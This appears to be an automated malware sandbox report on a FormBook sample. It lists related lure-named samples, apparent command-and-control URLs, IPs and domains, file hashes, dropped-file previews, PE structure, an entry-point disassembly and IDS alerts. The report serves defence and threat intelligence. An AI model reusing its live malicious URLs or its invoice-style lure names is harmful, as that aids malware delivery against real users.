	purchase order#034.exe	Get hash	malicious	Browse	www.hidennys.com/8ufh/?EzrthRhp=sNj8Sec9GqI0+hqF3zDptdIKoFxwJ6eQMN5NjCYIrvdQEt76PH0isvXP3IEsdJcOyN5p&ojo0f=SzrhU8
	PS-AVP2-307678.xlsx	Get hash	malicious	Browse	www.explorerthecity.com/nsag/?FN=nMtIT7U0R1IAAepWG53kf7KTbdq7isGDN9UDKAjWuyMqX8tFeFGDunaJCsr5Xe8pyAmRZg==&wDK0HL=OzrL
	#U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exe	Get hash	malicious	Browse	www.hydrabadproperties.com/n7ak/
	packet426.exe	Get hash	malicious	Browse	thespiritualhealth.com/wp-content/themes/lightweight/img4.php?k=w20a68bys22rt
	ETD 4.2 INVOICE, PACKING LIST.xlsx	Get hash	malicious	Browse	www.explorerthecity.com/nsag/?drmti4xx=nMtIT7U0R1IAAepWG53kf7KTbdq7isGDN9UDKAjWuyMqX8tFeFGDunaJCsr5Xe8pyAmRZg==&3fo=iJBh
	Invoice-0898764_pdf.exe	Get hash	malicious	Browse	www.eleriwyn.com/xgxp/?Cjp4a=ftxlnN6p&tXUt=KSW9RKoPc3Kh/CSV7AxGbGPbVlrTLMNWA5H4CU5GSt5Tcl+uSK1dERD9jfC+q3XvMFMA
	PO_210301.exe.exe	Get hash	malicious	Browse	www.homeownerdefenders.com/kbc/?T8Ud-te=4PX/28v1JVZVbcj+oKk1Amx2xgNaqYiJpFMQS6y6umMteFjOqTMFLhmTrBrbk6jmxMcJ&U48Ho=NtetPLUX-pOH6Vkp
	RAQ11986.exe	Get hash	malicious	Browse	www.homeownerdefenders.net/iae2/?uZntHjO=eOZAhbUf7hoWTLxHpQenGxn9ynY5QSqXsSeHMExh6aqc7Z+PeCtqk6zVweyDGmkWOS1c&U488k=Hvsdfr6HWtDxzF-
	DHL Shipment Notification 7465649870,pdf.exe	Get hash	malicious	Browse	www.wesharefiles.com/cna8/?EZA0IN=IiOf2nkSAsttykMZ9H4GkrBT0nSukx2Rz+Cptu2m/KJlDUhOyyQbdEpGgZ+rCh490K/8&DzrLH=VBZHY83XQx6heP
	P.O-48452689535945.exe	Get hash	malicious	Browse	www.covicio.com/h3qo/?LL04=OddLokl31qshFyWlyQEIcVDu0pAizKjoKxsWslvKSNLFFj/yIE9+GRG/HaxRm8+xLwnE&-ZAtX2=rVIHh
	Parcel _009887 .exe	Get hash	malicious	Browse	www.travaze.net/csw6/?t8bHuZw=5Csme1iBHNLN+MMVXv0Y+/dYmOMAu5DDsb4nl1t7CK7OkDyEaEwdChfrrdS2Koinfw+E+sdbXw==&2d=llsp
	NEW ORDER - VOLVO HK HKPO2102-13561,pdf.exe	Get hash	malicious	Browse	www.wesharefiles.com/cna8/?Iv4=XVs8FhyH&J6A8VhS0=IiOf2nkSAsttykMZ9H4GkrBT0nSukx2Rz+Cptu2m/KJlDUhOyyQbdEpGgZ+BdRI9wI38
	RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXE	Get hash	malicious	Browse	www.wesharefiles.com/cna8/?BvI=IiOf2nkSAsttykMZ9H4GkrBT0nSukx2Rz+Cptu2m/KJlDUhOyyQbdEpGgZ+BdRI9wI38&J690I=el8Pez2hlLm
	SK8HSWos1p.rtf	Get hash	malicious	Browse	www.prnttees.com/o8na/?6lhtznA=51OYCRjHpMN3HpclT1eaxLu+bDejj8XPwPDcg4oNcqWkkOhXz69T2J50gX1YIKk3eI3vVg==&rX=VzutZ2

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.qcmax.com	ARBmDNJS7m.exe	Get hash	malicious	Browse	104.128.125.95
www.bedpee.com	invoice bank.xlsx	Get hash	malicious	Browse	13.248.216.40
parking.namesilo.com	vbc.exe	Get hash	malicious	Browse	209.141.38.71
	Payment Slip.exe	Get hash	malicious	Browse	192.161.187.200
	UTcQK0heAfGWTLw.exe	Get hash	malicious	Browse	64.32.22.102
	RFQ # 1014397402856.pdf.exe	Get hash	malicious	Browse	204.188.203.155
	invoice bank.xlsx	Get hash	malicious	Browse	198.251.84.92
	Payment_Advice_REF344266.xlsx	Get hash	malicious	Browse	198.251.84.92
	Revised Signed Proforma Invoice 000856453553.exe	Get hash	malicious	Browse	188.164.131.200
	ZsA5S2nQAa.exe	Get hash	malicious	Browse	168.235.88.209
	New Purchase Order.exe	Get hash	malicious	Browse	204.188.203.155
	h8lD4SWL35.exe	Get hash	malicious	Browse	188.164.131.200
	d3r3jm1oKY.exe	Get hash	malicious	Browse	70.39.125.244
	9311-32400.pdf.exe	Get hash	malicious	Browse	45.58.190.82
	Invoice ICO ZRT.xlsx	Get hash	malicious	Browse	192.161.187.200
	RFQ MEDICAL EQUIPMENT_PDF.exe	Get hash	malicious	Browse	209.141.38.71
	v708469737489630001.exe	Get hash	malicious	Browse	192.161.187.200
	SPmG3TLdax.exe	Get hash	malicious	Browse	204.188.203.155
	RDAW-180-47D.exe	Get hash	malicious	Browse	64.32.22.102
	0HCan2RjnP.exe	Get hash	malicious	Browse	107.161.23.204
	1feiNnK6Qd.exe	Get hash	malicious	Browse	209.141.38.71
	Yc6FOuQigh.exe	Get hash	malicious	Browse	198.251.84.92
parkingpage.namecheap.com	PaymentAdvice.exe	Get hash	malicious	Browse	198.54.117.218
	DYANAMIC Inquiry.xlsx	Get hash	malicious	Browse	198.54.117.216
	Quotation Zhejiang.xlsx	Get hash	malicious	Browse	198.54.117.215
	TACA20210407.PDF.exe	Get hash	malicious	Browse	198.54.117.212
	46578-TR.exe	Get hash	malicious	Browse	198.54.117.218
	ALPHA SCIENCE, INC.exe	Get hash	malicious	Browse	198.54.117.216
	SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe	Get hash	malicious	Browse	198.54.117.217
	1517679127365.exe	Get hash	malicious	Browse	198.54.117.216
	BL-2010403L.exe	Get hash	malicious	Browse	198.54.117.218
	Shinshin Machinery.exe.exe	Get hash	malicious	Browse	198.54.117.212
	PDF NEW P.OJerhWEMSj4RnE4Z.exe	Get hash	malicious	Browse	198.54.117.217
	INV-210318L.exe	Get hash	malicious	Browse	198.54.117.212
	Inquiry.docx	Get hash	malicious	Browse	198.54.117.218
	BL Draft copy.exe	Get hash	malicious	Browse	198.54.117.215
	Order.exe	Get hash	malicious	Browse	198.54.117.210
	PO.1183.exe	Get hash	malicious	Browse	198.54.117.211
	TSPO0001978-xlxs.exe	Get hash	malicious	Browse	198.54.117.216
	evaoRJkeKU.exe	Get hash	malicious	Browse	198.54.117.210
	igPVY6UByI.exe	Get hash	malicious	Browse	198.54.117.216
	Swift001_jpg.exe	Get hash	malicious	Browse	198.54.117.218

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	vbc.exe	Get hash	malicious	Browse	195.201.179.80
	vgUgvbLjyI.exe	Get hash	malicious	Browse	195.201.225.248
	Rechnung.doc	Get hash	malicious	Browse	46.4.51.158
	6IGbftBsBg.exe	Get hash	malicious	Browse	88.99.66.31
	SecuriteInfo.com.W32.AIDetect.malware2.22480.exe	Get hash	malicious	Browse	195.201.225.248
	Revised Invoice No CU 7035.exe	Get hash	malicious	Browse	78.46.133.81
	ikoAImKWvI.exe	Get hash	malicious	Browse	88.99.66.31
	V7UnYc7CCN.exe	Get hash	malicious	Browse	88.99.66.31
	uTQdPoKj0h.exe	Get hash	malicious	Browse	95.217.123.103
	uTQdPoKj0h.exe	Get hash	malicious	Browse	95.217.123.103
	Updated SOA.xlsx	Get hash	malicious	Browse	136.243.92.92
	SecuriteInfo.com.W32.AIDetect.malware1.16239.exe	Get hash	malicious	Browse	195.201.225.248
	SecuriteInfo.com.W32.AIDetect.malware1.23167.exe	Get hash	malicious	Browse	195.201.225.248
	receipt-xxxx.htm	Get hash	malicious	Browse	88.99.136.47
	comprobante de pago bancario.exe	Get hash	malicious	Browse	168.119.91.111
	April_2021_Purchase_Order_000000000000000000000000.pdf.exe	Get hash	malicious	Browse	95.217.195.80
	PAY-INV-1007.exe	Get hash	malicious	Browse	95.217.195.80
	40JHtWiswn.exe	Get hash	malicious	Browse	195.201.225.248
	34#U0e15.exe	Get hash	malicious	Browse	116.203.213.72
	PO91361.exe	Get hash	malicious	Browse	135.181.76.226
ST-BGPUS	UTcQK0heAfGWTLw.exe	Get hash	malicious	Browse	64.32.22.102
	RFQ # 1014397402856.pdf.exe	Get hash	malicious	Browse	204.188.203.155
	BIOTECHPO960488580.exe	Get hash	malicious	Browse	205.144.171.210
	GJK-KAOHSIUNG-2101.xlsx	Get hash	malicious	Browse	205.144.171.138
	New Purchase Order.exe	Get hash	malicious	Browse	204.188.203.155
	9311-32400.pdf.exe	Get hash	malicious	Browse	45.58.190.82
	ssyrNaO6AP.dll	Get hash	malicious	Browse	70.39.99.196
	5401628864_AWB_28002_2021-17-03 2.exe	Get hash	malicious	Browse	67.21.94.15
	SPmG3TLdax.exe	Get hash	malicious	Browse	204.188.203.155
	RDAW-180-47D.exe	Get hash	malicious	Browse	64.32.22.102
	Doc_3847468364836483638463,pdf.exe	Get hash	malicious	Browse	170.178.168.203
	gV8xdP8bas.exe	Get hash	malicious	Browse	104.160.174.169
	DHL.INFORMATION.TRACKING.exe	Get hash	malicious	Browse	67.21.94.4
	pVXFB33FzO.exe	Get hash	malicious	Browse	104.160.174.164
	ICrLYbQDcRrTPg5.exe	Get hash	malicious	Browse	67.21.94.4
	Complaint-Copy-676926603-03092021.xls	Get hash	malicious	Browse	205.144.171.49
	Complaint-Copy-645863057-03092021.xls	Get hash	malicious	Browse	205.144.171.49
	Complaint-Copy-676926603-03092021.xls	Get hash	malicious	Browse	205.144.171.49
	Complaint-Copy-645863057-03092021.xls	Get hash	malicious	Browse	205.144.171.49
	Complaint-Copy-1308127799-03092021.xls	Get hash	malicious	Browse	205.144.171.49
SEDO-ASDE	zIZsNOecPuLdGCf.exe	Get hash	malicious	Browse	91.195.240.94
	RMwfvA9kZy.exe	Get hash	malicious	Browse	91.195.240.94
	h8lD4SWL35.exe	Get hash	malicious	Browse	91.195.240.94
	FIN4.docm	Get hash	malicious	Browse	91.195.240.13
	FIN4.docm	Get hash	malicious	Browse	91.195.240.13
	FIN4.docm	Get hash	malicious	Browse	91.195.240.13
	triage_dropped_file.exe	Get hash	malicious	Browse	91.195.240.94
	OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exe	Get hash	malicious	Browse	91.195.240.94
	32ciKQsy2X.exe	Get hash	malicious	Browse	91.195.240.94
	quLdcfImUL.exe	Get hash	malicious	Browse	91.195.241.137
	Swift.exe	Get hash	malicious	Browse	91.195.241.137
	MT LIANG SHENG_Ningbo Notice.xlsx	Get hash	malicious	Browse	91.195.241.137
	PALERMO PO4215.xlsx	Get hash	malicious	Browse	91.195.241.137
	NEW ORDER QUOTATION.xlsx	Get hash	malicious	Browse	91.195.241.137
	Payment Copy.exe	Get hash	malicious	Browse	91.195.240.12
	purchase order#034.exe	Get hash	malicious	Browse	91.195.240.94
	PS-AVP2-307678.xlsx	Get hash	malicious	Browse	91.195.240.94
	#U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exe	Get hash	malicious	Browse	91.195.240.94
	FeDex Shipment Confirmation.exe	Get hash	malicious	Browse	91.195.241.137
	FeDex Shipment Confirmation.exe	Get hash	malicious	Browse	91.195.241.137

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll	Quotation Zhejiang.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\35ab8wlx6zqe82u0 Download File
Process:	C:\Users\user\Desktop\eQLPRPErea.exe
File Type:	data
Category:	dropped
Size (bytes):	164864
Entropy (8bit):	7.998989332403079
Encrypted:	true
SSDEEP:	3072:5Uc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlR:5Uc2SXli2LbG87uroXR585UcNKbbR
MD5:	9A9A459A5A231E0F2520C491C61FA1DA
SHA1:	7FD4E213B226ABE116437E168F0D27844B983592
SHA-256:	D0728A76A7BF4D436FAC8890A32E8C96B42CCD660B4E48927EB465E334598B1E
SHA-512:	F4CA81A0DB7340FB23AA4E21667838B8C88D5F3C84F47B48D77CD5CA5CE296C260F31B26A29187AB3739DD7196372D5FD40B5699B5D7D118E6C8E6328BCAE447
Malicious:	false
Reputation:	low
Preview:	=n.....3@.1..o..%..(..D.../.x.9....u..{..;.enPL!..#..0.6z.d.{j.......,k..Q.hP#.N.`.F.76.l.....NZ.D....Mj.....c.e.4...j}A.8.G.GY..Z........M.(C........JF.Q..B.S.....F...m.fcF&HK........,.L,~...... ..Er....y`...0. .(`..s.C.'.9.@.Mg..d....v.EN$.R.W...x.6.\U..?m.V....oIf....U9T.6...>.E..x...+<C@mSf....s.v.......5..G.$o..1..]...(....zg.S.X9.\..ZnbsX@D.N..(I..r.....N...T......i....A...[_],.e....u.D...z~...?\..r.......1....}.....$..C.a.#~.n...#`..E~....fw]"..b..q....1.6 5.:N.~.'9.G o........./K=...._+.U..8...4.}...] ...C@.Bv....k9.h'.`E...zkI..:...r.d5.l.....iH8.P..H..2$"..k].^u.x.1........uX...^.....,/.}BHT...73..... ..My.BV^tV.^ $..r.l.:<+<..k...^.6./. .u......2....<..f`nz.6g^.Z......t..Ox.(.iBV`4.+.B.01..)...?..D..>.....~..'.dm....C..S..<...x<...P......`..&5<...>...u.}4.AQ~.._.V.3t5.......x...\._oF....2..............O-.(..H.TQo.....=...w7R.C...{...j7.Fm..[..<..}...3.."..~...]..*.x..9.........M<.......S:.b....'.e/K....q.m<..l.m..At._.

C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll Download File
Process:	C:\Users\user\Desktop\eQLPRPErea.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.171187189386588
Encrypted:	false
SSDEEP:	48:StGht7Wr3QTZj0a6PTh7SKFt5ET9TbOGa4zzBvoAXAdUMQ9Bg6RuqS:jSrATZX6BD5EhTiGXHBgVueax
MD5:	7023C422B5D2571D6B132378437B1E9E
SHA1:	1F2C41B1E36DDA6ED420B5F8708AF6457F59A10D
SHA-256:	2BF1F784B019210A10EEF61E5AF8ABFBB9E02748CF9D6718F4BF6B3F72661779
SHA-512:	2659574EDE5079F0B522C01E0FD7FCDD4DED74D895650126979980221BA77582C01DEFA76DDDDA42BC73E4C5CC8268D4285DA29D6C438212503B6ED1529C596D
Malicious:	false
Joe Sandbox View:	Filename: Quotation Zhejiang.xlsx, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L....m`...........!......................... ...............................`............@......................... !..P...\".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\qmnajxcs95hz Download File
Process:	C:\Users\user\Desktop\eQLPRPErea.exe
File Type:	data
Category:	dropped
Size (bytes):	6661
Entropy (8bit):	7.96450606123374
Encrypted:	false
SSDEEP:	192:mKamyP2+KBf3IfmRxQpCkEAEYfu6tOy7UUwv9:m91i9YsxnkBuN2Q
MD5:	56D7E12AB211686BE29BD8E00F4A46DA
SHA1:	AD4A22657ADE632D181D7C523F3203E76695B546
SHA-256:	0F8A856FF0A1A63EA5BBF83BF33C4B61B4444512A53FB43A8811705042DB3A39
SHA-512:	08C01CD9B8F8E5BC5AEA8E031DBA01DEABC85499AAFC3E9228B524C7A5AD2668280B4EBA535A79BAE4F57FF21D460998C0D6D13ADDF24F8D96926C382E8B6960
Malicious:	false
Reputation:	low
Preview:	....&...:..W..i.....!...'K.Sx..:A8!<...;....4.....%.\|...........v\...`Y~..NQ.v7..qQ# y..E\......s2...\|...;..~.w%....\|=...k....;{bL.._XQ9x..H....4Mm..Ze..K....e.....1h....../n... ...h.R{l..`o.@....C.....W~A..CD~.d...67.R....[w..I'.....i...<A..Z..yr...?:/.S/...h....-..:AU.2.U.;..al....W70.bgu.?X......[..u.kRM..OH.i(...zX(+?..D]y....z;...}......a..".....>....."!..@.k\..P_.0q..R3O....'NQ..ST.5t....t..L...a.....2.o.{_5KJZm....(..$.{.....h[...Z.:'.W~....!..+..[..k....m...z..........X+.Ob;k..(.W?>..Y..GF.v..6.&.....M.(jsU..X.u.y....ih.O..4t...M1.:.tu6IB..!S\.!Mt.<xy:...w6...8.E....\|...5....a./..x..i.\|=r....@..........l.....-.......2..L..KT.............(..".,m.S..#..#.`o.@.....V...cP..O.d.Uq.a...v.......PY.Aur.^...M\...y3.:.d.3....7^..~..8....S..I..=6}......5f..4a..6..O......=.....ur.~.;.'Vp.....4...p3.#n4.$et...=c..?...<.V~..Ga~...1\|=.. t.@.....Z.gt.4........ Z.+.4u...&...K....^).8.Mh...D..V$...m.2]....,.....m....Y..ND..~..H....../.#.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.915089020780882
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	eQLPRPErea.exe
File size:	206065
MD5:	2c64897aa30694cc768f5ea375157932
SHA1:	c897f37780a5237d5c330bcf2668745201b38ff5
SHA256:	18d465a5867ee069480bb9be8eb259be41cc008e487b7b6a3cad14e3559963a9
SHA512:	6c1cfc20e4aaf0ee78b60a80c5ff559cb71ac31b62f2e9068638046cd3fec5fe078f37de85c50c65090b82d784931e07bdf692a597b14133eae36ad143b3fea2
SSDEEP:	3072:NeYBCwqDxkJ0KBUc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlP4:NDIKUc2SXli2LbG87uroXR585UcNKbbQ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L.....8E.................\.........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x403166
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4538CD1D [Fri Oct 20 13:20:29 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	18bc6fa81e19f21156316b1ae696ed6b

Entrypoint Preview

Instruction
sub esp, 0000017Ch
push ebx
push ebp
push esi
xor esi, esi
push edi
mov dword ptr [esp+18h], esi
mov ebp, 00409240h
mov byte ptr [esp+10h], 00000020h
call dword ptr [00407030h]
push esi
call dword ptr [00407270h]
mov dword ptr [0042F4D0h], eax
push esi
lea eax, dword ptr [esp+30h]
push 00000160h
push eax
push esi
push 00429860h
call dword ptr [00407158h]
push 00409230h
push 0042EC20h
call 00007FC0E8845788h
mov ebx, 00436400h
push ebx
push 00000400h
call dword ptr [004070B4h]
call 00007FC0E8842EC9h
test eax, eax
jne 00007FC0E8842F86h
push 000003FBh
push ebx
call dword ptr [004070B0h]
push 00409228h
push ebx
call 00007FC0E8845773h
call 00007FC0E8842EA9h
test eax, eax
je 00007FC0E88430A2h
mov edi, 00435000h
push edi
call dword ptr [00407140h]
call dword ptr [004070ACh]
push eax
push edi
call 00007FC0E8845731h
push 00000000h
call dword ptr [00407108h]
cmp byte ptr [00435000h], 00000022h
mov dword ptr [0042F420h], eax
mov eax, edi
jne 00007FC0E8842F6Ch
mov byte ptr [esp+10h], 00000022h
mov eax, 00000001h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7450	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x567	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x280	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5bfe	0x5c00	False	0.677097486413	data	6.48704517882	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x11fe	0x1200	False	0.465494791667	data	5.27785481266	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x264d4	0x400	False	0.6669921875	data	5.22478733059	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x30000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x38000	0x567	0x600	False	0.432942708333	data	3.95240646825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x38100	0x100	data	English	United States
RT_DIALOG	0x38200	0x11c	data	English	United States
RT_DIALOG	0x3831c	0x60	data	English	United States
RT_MANIFEST	0x3837c	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll	ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/08/21-10:48:49.778557	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.4	184.168.131.241
04/08/21-10:48:49.778557	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.4	184.168.131.241
04/08/21-10:48:49.778557	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.4	184.168.131.241
04/08/21-10:48:55.129556	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.4	13.248.216.40
04/08/21-10:48:55.129556	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.4	13.248.216.40
04/08/21-10:48:55.129556	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.4	13.248.216.40
04/08/21-10:48:55.307358	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49737	13.248.216.40	192.168.2.4
04/08/21-10:49:16.320554	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49755	34.102.136.180	192.168.2.4
04/08/21-10:49:21.406011	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49758	80	192.168.2.4	64.190.62.111
04/08/21-10:49:21.406011	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49758	80	192.168.2.4	64.190.62.111
04/08/21-10:49:21.406011	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49758	80	192.168.2.4	64.190.62.111
04/08/21-10:49:32.039463	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49765	80	192.168.2.4	91.195.240.94
04/08/21-10:49:32.039463	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49765	80	192.168.2.4	91.195.240.94
04/08/21-10:49:32.039463	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49765	80	192.168.2.4	91.195.240.94
04/08/21-10:49:43.196349	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49768	80	192.168.2.4	34.102.136.180
04/08/21-10:49:43.196349	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49768	80	192.168.2.4	34.102.136.180
04/08/21-10:49:43.196349	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49768	80	192.168.2.4	34.102.136.180
04/08/21-10:49:43.311575	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49768	34.102.136.180	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 10:48:49.599870920 CEST	49734	80	192.168.2.4	184.168.131.241
Apr 8, 2021 10:48:49.778085947 CEST	80	49734	184.168.131.241	192.168.2.4
Apr 8, 2021 10:48:49.778321981 CEST	49734	80	192.168.2.4	184.168.131.241
Apr 8, 2021 10:48:49.778557062 CEST	49734	80	192.168.2.4	184.168.131.241
Apr 8, 2021 10:48:49.956588984 CEST	80	49734	184.168.131.241	192.168.2.4
Apr 8, 2021 10:48:49.956664085 CEST	80	49734	184.168.131.241	192.168.2.4
Apr 8, 2021 10:48:49.956691980 CEST	80	49734	184.168.131.241	192.168.2.4
Apr 8, 2021 10:48:49.957007885 CEST	49734	80	192.168.2.4	184.168.131.241
Apr 8, 2021 10:48:49.957043886 CEST	49734	80	192.168.2.4	184.168.131.241
Apr 8, 2021 10:48:50.135140896 CEST	80	49734	184.168.131.241	192.168.2.4
Apr 8, 2021 10:48:55.114048958 CEST	49737	80	192.168.2.4	13.248.216.40
Apr 8, 2021 10:48:55.126236916 CEST	80	49737	13.248.216.40	192.168.2.4
Apr 8, 2021 10:48:55.129455090 CEST	49737	80	192.168.2.4	13.248.216.40
Apr 8, 2021 10:48:55.129555941 CEST	49737	80	192.168.2.4	13.248.216.40
